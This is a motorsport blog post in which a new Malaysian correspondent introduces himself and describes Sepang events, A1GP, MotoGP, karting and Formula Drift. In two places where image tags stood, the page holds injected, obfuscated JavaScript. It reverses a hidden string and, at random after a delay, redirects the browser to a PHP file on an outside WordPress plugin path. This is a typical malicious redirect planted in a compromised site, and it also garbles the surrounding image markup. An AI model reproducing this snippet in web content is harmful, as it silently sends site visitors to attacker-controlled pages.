As a new team member of crankandpiston.com it is my first time to say hello and do a short self intro to everybody here. I’m from Malaysia and I will be your Malaysian correspondent bringing news and insights of the scenes here.I’ve been taking photos and covering events in Malaysia for about a year now and it has been a learning year for me both in terms of the sports and more so photography. To be able to actually capture the essence of motorsports through photography and present it to the audience of crankandpiston.com is a challenging prospect.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/contributors/muaz/introduction/muaz228.jpg” width=”728″ />

Hopefully my venture here at crankandpiston.com is going to delight everybody and I’m already looking forward to great things here.To those in the dark Malaysian motorsport is quite new, nevertheless the growth has been exponential thanks to our Sepang International Circuit. Since its inception Malaysia has hosted several international world class events such as Formula One, Motogp, A1GP and Japan GT to name a few. Our local scene such as Malaysian Merdeka Endurance Race has attracted a number of international teams from all over the world. Added to that we have Drift and Karting growing like crazy…all very exciting for 2010.

2008 and beyond were supposed to be the best years for A1GP…having the use of Ferrari chassis and engines, organisers were hoping for the series to be more prestigious worldwide. However due to high costs and lack of interest in the series it sadly collapsed in 2009.

It’s rare for me to get the chance to be a part of an international event, so I’m slightly sad the series couldn’t survive….however local culture is growing!

I think no one needs introduction to the Road Racing World Championship Grand Prix. I suppose we use to refer to it as Motogp, which is the premier class category featuring 7-times championship winner Valentino Rossi…the flamboyant king! With his antics on and off the track it’s a thrill to welcome him back in 2010 at Sepang.

With 108 entries, the first ever Red White Sangari Invitational Kart Prix Championship at Sepang Go-Kart Track was a great success, both in terms of participation and racing intensity.

Drivers from United Kingdom, Brazil, Japan, Thailand, Indonesia, Malaysia, Singapore, Switzerland, Macau, Germany, Netherlands and Philippines were determined to demonstrate their driving skills against each other. Below are some of the pictures of the event.

Professional drifting is still comparatively new in South East Asia, but the first ever Formula Drift Malaysia is a step in the right direction.

In south East Asia region, Malaysia perhaps has one the biggest pool of drift drivers. So, I would say that it’s about time for the organisers to expose the sport to Malaysians.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/contributors/muaz/introduction/muaz246.jpg” width=”728″ />

Drifting in Malaysia has seen exponential growth, homegrown talent such as Tengku Djan has competed at International Drifting Events and it has generated a lot of positive impact on the local drifting scene. Neighboring Thailand and Singapore which hosted the previous rounds of Formula Drift also receives positive benefits due to its proximity in the region.

2010 promises to offer yet more exciting coverage.
